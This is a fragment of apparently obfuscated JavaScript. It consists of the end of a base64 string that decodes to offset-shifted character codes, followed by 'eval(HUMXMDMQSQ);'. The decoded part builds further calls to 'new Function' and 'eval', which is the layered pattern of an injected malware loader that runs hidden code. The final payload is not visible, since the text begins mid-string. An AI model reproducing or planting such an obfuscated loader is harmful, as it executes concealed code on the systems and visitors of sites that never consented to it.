gsIDQ0IC0gNCwgMTEyIC0gMiwgMTEwIC0gOSwgMTI2IC0gNywgMzggLSA2LCA3NSAtIDUsIDExOCAtIDEsIDExNiAtIDYsIDEwNiAtIDcsIDEyMyAtIDcsIDEwNyAtIDIsIDExMiAtIDEsIDExMiAtIDIsIDQyIC0gMiwgMTA3IC0gNywgMTA5IC0gOCwgMTA4IC0gOSwgNDggLSA3LCA0NyAtIDYsIDQ5IC0gOSwgNDYgLSA1LCA2MyAtIDQsIDE1IC0gNSwgMTYgLSA2KTtldmFsKEhSSU9XVUhEV1QpOw==’);
eval(HUMXMDMQSQ);